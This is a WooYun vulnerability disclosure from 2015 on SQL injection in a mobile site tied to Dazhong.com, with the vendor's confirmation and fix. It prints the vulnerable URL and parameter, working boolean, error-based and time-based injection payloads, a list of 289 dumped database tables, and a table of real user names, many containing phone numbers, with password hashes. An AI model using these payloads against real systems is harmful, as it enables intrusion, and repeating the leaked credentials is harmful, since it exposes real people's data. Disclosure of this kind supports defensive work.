大众网旗下站点SQL注入 | wooyun-2015-0144505| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144505

漏洞标题：大众网旗下站点SQL注入

漏洞作者：路人甲

提交时间：2015-10-02 16:02

修复时间：2015-10-08 15:50

公开时间：2015-10-08 15:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-02：细节已通知厂商并且等待厂商处理中
2015-10-08：厂商已经确认，细节仅向厂商公开
2015-10-08：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

别的不会就会扫注入。。

详细说明：

http://m.zyql.cn/?m=android/scenic.scenicDetail&id=64

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=android/scenic.scenicDetail&id=64 AND 1812=1812
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=android/scenic.scenicDetail&id=64 AND (SELECT 3290 FROM(SELECT CO
UNT(*),CONCAT(0x3a7267763a,(SELECT (CASE WHEN (3290=3290) THEN 1 ELSE 0 END)),0x
3a7365633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)
a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=android/scenic.scenicDetail&id=64 AND SLEEP(5)
---

[289 tables]
+----------------------------------------+
| api_publish                            |
| btob_api_push                          |
| btob_btoc_scenic_ticket_reserve_config |
| btob_consume                           |
| btob_finance                           |
| btob_level                             |
| btob_member                            |
| btob_member_authority                  |
| btob_member_log                        |
| btob_money_log                         |
| btob_msg_log                           |
| btob_notice                            |
| btob_order                             |
| btob_order_log                         |
| btob_order_reserve                     |
| btob_order_reserve_cashback            |
| btob_order_return                      |
| btob_pay                               |
| btob_pay_log                           |
| btob_print_log                         |
| btob_push_task_list                    |
| btob_reverse                           |
| btob_scenic                            |
| btob_scenic_ticket                     |
| btob_scenic_type                       |
| btob_verify_push_zyql                  |
| ecs_region                             |
| ecs_scenic                             |
| ecs_scenic_admin                       |
| ecs_scenic_comment                     |
| ecs_scenic_order                       |
| ecs_scenic_order_ticket                |
| ecs_scenic_ticket                      |
| ecs_sms_logs                           |
| ecs_users                              |
| el_brand                               |
| el_hotel                               |
| el_hoteldetail                         |
| el_hotelorder                          |
| el_hotelorderrate                      |
| el_image                               |
| el_poi                                 |
| el_poi_copy                            |
| el_room                                |
| el_tmporderinfo                        |
| jd_ad                                  |
| jd_admin                               |
| jd_adminlog                            |
| jd_admintype                           |
| jd_article                             |
| jd_article_class                       |
| jd_chain                               |
| jd_chainnum                            |
| jd_city                                |
| jd_flink                               |
| jd_hotel                               |
| jd_hotel_api                           |
| jd_keywords                            |
| jd_layout                              |
| jd_module                              |
| jd_ncity                               |
| jd_purview                             |
| jd_rewrite                             |
| jd_sysconfig                           |
| jd_usergroup                           |
| my_activity                            |
| my_activity_comment                    |
| my_admin                               |
| my_admin_log                           |
| my_appmoney                            |
| my_area_blacklist                      |
| my_article                             |
| my_authorize                           |
| my_bonus_send                          |
| my_bonus_type                          |
| my_comment                             |
| my_comment_impression                  |
| my_delta                               |
| my_dict_roomprice                      |
| my_elong_blacklist                     |
| my_finance                             |
| my_finance_log                         |
| my_hotel                               |
| my_level                               |
| my_line                                |
| my_line_comment                        |
| my_member                              |
| my_module                              |
| my_msg_log                             |
| my_msg_times                           |
| my_nopay                               |
| my_order_activity                      |
| my_order_line                          |
| my_order_log_zypw                      |
| my_order_room                          |
| my_order_rural                         |
| my_order_scenic                        |
| my_order_scenic_813                    |
| my_order_scenic_828                    |
| my_order_scenic_i                      |
| my_order_scenic_zhj                    |
| my_order_scenic_zhj_0901               |
| my_order_scenic_zhj_copy               |
| my_pay                                 |
| my_photo                               |
| my_publish                             |
| my_question                            |
| my_raiders                             |
| my_reply                               |
| my_room                                |
| my_rural                               |
| my_rural_admin                         |
| my_rural_comment                       |
| my_rural_price                         |
| my_rural_stock                         |
| my_rural_ticket                        |
| my_rural_type                          |
| my_sale                                |
| my_scenic                              |
| my_scenic_admin                        |
| my_scenic_comment                      |
| my_scenic_price                        |
| my_scenic_stock                        |
| my_scenic_ticket                       |
| my_scenic_type                         |
| my_seckill_order_scenic                |
| my_seckill_order_scenic_log            |
| my_seckill_ticket                      |
| my_service                             |
| my_special_price                       |
| my_stock                               |
| my_trace                               |
| my_type                                |
| t_system_failedlogins                  |
| t_system_log                           |
| t_system_memberfields                  |
| t_system_members                       |
| t_system_onlinetime                    |
| t_system_report                        |
| t_system_robot                         |
| t_system_robot_ip                      |
| t_system_robot_log                     |
| t_system_role                          |
| t_system_role_action                   |
| t_system_role_module                   |
| t_system_sessions                      |
| t_tttuangou_address                    |
| t_tttuangou_api_apps                   |
| t_tttuangou_api_protocol               |
| t_tttuangou_api_session                |
| t_tttuangou_article                    |
| t_tttuangou_attrs                      |
| t_tttuangou_attrs_cat                  |
| t_tttuangou_attrs_order                |
| t_tttuangou_catalog                    |
| t_tttuangou_city                       |
| t_tttuangou_city_place                 |
| t_tttuangou_comments                   |
| t_tttuangou_express                    |
| t_tttuangou_express_area               |
| t_tttuangou_express_cdp                |
| t_tttuangou_express_corp               |
| t_tttuangou_express_printer_log        |
| t_tttuangou_finder                     |
| t_tttuangou_metas                      |
| t_tttuangou_order                      |
| t_tttuangou_order_clog                 |
| t_tttuangou_paylog                     |
| t_tttuangou_payment                    |
| t_tttuangou_prize_phone                |
| t_tttuangou_prize_ticket               |
| t_tttuangou_prize_ticket_win           |
| t_tttuangou_product                    |
| t_tttuangou_push_log                   |
| t_tttuangou_push_queue                 |
| t_tttuangou_push_template              |
| t_tttuangou_question                   |
| t_tttuangou_recharge_card              |
| t_tttuangou_recharge_order             |
| t_tttuangou_regions                    |
| t_tttuangou_reports                    |
| t_tttuangou_seller                     |
| t_tttuangou_service                    |
| t_tttuangou_subscribe                  |
| t_tttuangou_ticket                     |
| t_tttuangou_uploads                    |
| t_tttuangou_usermoney                  |
| t_tttuangou_usermsg                    |
| t_tttuangou_zlog                       |
| tao_cancel                             |
| tao_consume_logs                       |
| tao_order                              |
| tao_resend                             |
| tao_reverse                            |
| v9_ad                                  |
| v9_ad_data                             |
| v9_admin                               |
| v9_admin_panel                         |
| v9_admin_role                          |
| v9_admin_role_priv                     |
| v9_attachment                          |
| v9_attachment_index                    |
| v9_badword                             |
| v9_block                               |
| v9_block_history                       |
| v9_block_priv                          |
| v9_cache                               |
| v9_category                            |
| v9_category_priv                       |
| v9_collection_content                  |
| v9_collection_history                  |
| v9_collection_node                     |
| v9_collection_program                  |
| v9_content_check                       |
| v9_copyfrom                            |
| v9_datacall                            |
| v9_dbsource                            |
| v9_download                            |
| v9_download_data                       |
| v9_downservers                         |
| v9_extend_setting                      |
| v9_favorite                            |
| v9_hits                                |
| v9_ipbanned                            |
| v9_keylink                             |
| v9_keyword                             |
| v9_keyword_data                        |
| v9_linkage                             |
| v9_log                                 |
| v9_member                              |
| v9_member_detail                       |
| v9_member_group                        |
| v9_member_menu                         |
| v9_member_verify                       |
| v9_member_vip                          |
| v9_menu                                |
| v9_model                               |
| v9_model_field                         |
| v9_module                              |
| v9_news                                |
| v9_news_data                           |
| v9_page                                |
| v9_pay_account                         |
| v9_pay_payment                         |
| v9_pay_spend                           |
| v9_picture                             |
| v9_picture_data                        |
| v9_position                            |
| v9_position_data                       |
| v9_poster                              |
| v9_poster_201402                       |
| v9_poster_201403                       |
| v9_poster_201404                       |
| v9_poster_201406                       |
| v9_poster_201407                       |
| v9_poster_201408                       |
| v9_poster_201409                       |
| v9_poster_201410                       |
| v9_poster_201412                       |
| v9_poster_201505                       |
| v9_poster_201509                       |
| v9_poster_space                        |
| v9_queue                               |
| v9_release_point                       |
| v9_search                              |
| v9_search_keyword                      |
| v9_session                             |
| v9_site                                |
| v9_special                             |
| v9_special_c_data                      |
| v9_special_content                     |
| v9_sphinx_counter                      |
| v9_sso_admin                           |
| v9_sso_applications                    |
| v9_sso_members                         |
| v9_sso_messagequeue                    |
| v9_sso_session                         |
| v9_sso_settings                        |
| v9_template_bak                        |
| v9_times                               |
| v9_type                                |
| v9_urlrule                             |
| v9_video                               |
| v9_video_content                       |
| v9_video_data                          |
| v9_video_store                         |
| v9_workflow                            |
| v9_zyqlproduct                         |
| v9_zyqlproduct_data                    |
+----------------------------------------+

漏洞证明：

随便读了几个user...

+----------------------------------+-----------------+
| password                         | user_name       |
+----------------------------------+-----------------+
| a3545bd79d31f9a72d3a78690adf73fc | zsd_15692397606 |
| a35d11c2f995c60b0341a9c777f1ae03 | zsd_13964145843 |
| a35d11c2f995c60b0341a9c777f1ae03 | zsd_13730971688 |
| a35e47afa1d3e418e42a24151e0ac4e1 | lizhenq         |
| a35f4223bb8f6c8638dc91d94e9b16f5 | zsd_15605433688 |
| a35f4223bb8f6c8638dc91d94e9b16f5 | zsd_15550442702 |
| a35fe7f7fe8217b4369a0af4244d1fca | zsd_13906332915 |
| a368b0de8b91cfb3f91892fbf1ebd4b2 | zsd_13863520806 |
| a36adbc35e69b22acbf9f834a0deb286 | zsd_15953797189 |
| a36b0dcd1e6384abc0e1867860ad3ee3 | zsd_15269992087 |
| a36b0dcd1e6384abc0e1867860ad3ee3 | zsd_18364112339 |
| a36b598abb934e4528412e5a2127b931 | zsd_13573368888 |
| a36e841c5230a79c2102036d2e259848 | zsd_15615316666 |
| a36e841c5230a79c2102036d2e259848 | zsd_13792174520 |
| a376033f78e144f494bfc743c0be3330 | zsd_13325091256 |
| a376802c0811f1b9088828288eb0d3f0 | zsd_13563733690 |
| a376802c0811f1b9088828288eb0d3f0 | zsd_18643584676 |
| a3788c8c64fd65c470e23e7534c3ebc8 | zsd_13287720902 |
| a37e0e39e1495a423b9d86bc058e9c27 | ????            |
| a381c2c35c9157f6b67fd07d5a200ae1 | zsd_18766944270 |
| a381c2c35c9157f6b67fd07d5a200ae1 | zsd_18754196080 |
+----------------------------------+-----------------+

修复方案：

过滤过滤过滤！

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-10-08 11:36

厂商回复：

感谢各种路人甲。
boss第一时间赶到现场，亲自训诫了研发人员，目前研发人员情绪稳定。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144505

漏洞标题：大众网旗下站点SQL注入

相关厂商：大众网

漏洞作者：路人甲

提交时间：2015-10-02 16:02

修复时间：2015-10-08 15:50

公开时间：2015-10-08 15:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144505

漏洞标题：大众网旗下站点SQL注入

相关厂商：大众网

漏洞作者： 路人甲

提交时间：2015-10-02 16:02

修复时间：2015-10-08 15:50

公开时间：2015-10-08 15:50

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144505"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云